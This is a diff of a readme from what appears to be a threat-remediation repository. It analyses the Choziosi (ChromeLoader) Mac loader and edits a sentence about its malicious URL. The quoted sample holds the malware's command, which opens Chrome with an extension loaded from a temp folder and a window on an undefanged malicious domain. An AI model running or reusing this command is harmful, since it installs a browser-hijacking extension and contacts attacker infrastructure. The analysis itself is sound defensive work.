xephora/Threat-Remediation-Scripts/Threat-Track/Mac-ChoziosiLoader/readme.md

 open -na 'Google Chrome' --args -load-extension='/private/var/tmp/D018DB95-ABAB-444F-87DC-13D8F9DAF25F' --new-window 'https://ationwindon.com/?tid=949115&optid=913393&cook=599881554480138044&agec=1650725231';
 ```

 Based on the above information, we can see that 3 seperate bash commands are executed which loads a ChromeExtension stored in the `tmp` directory.
 Based on this sample we can see that extension `D018DB95-ABAB-444F-87DC-13D8F9DAF25F` is loaded.
-Also one of the extension contains a mal url (https[:]//ationwindon[.]com/?tid=949115&optid=913393&cook=599881554480138044&agec=1650725231) where the domain periodically makes requests.
+Also one of the extension contains a mal url (https[:]//ationwindon[.]com/?tid=949115&optid=913393&cook=599881554480138044&agec=1650725231).
+The Choziosi loader periodically makes requests to this mal url.

 Extension contents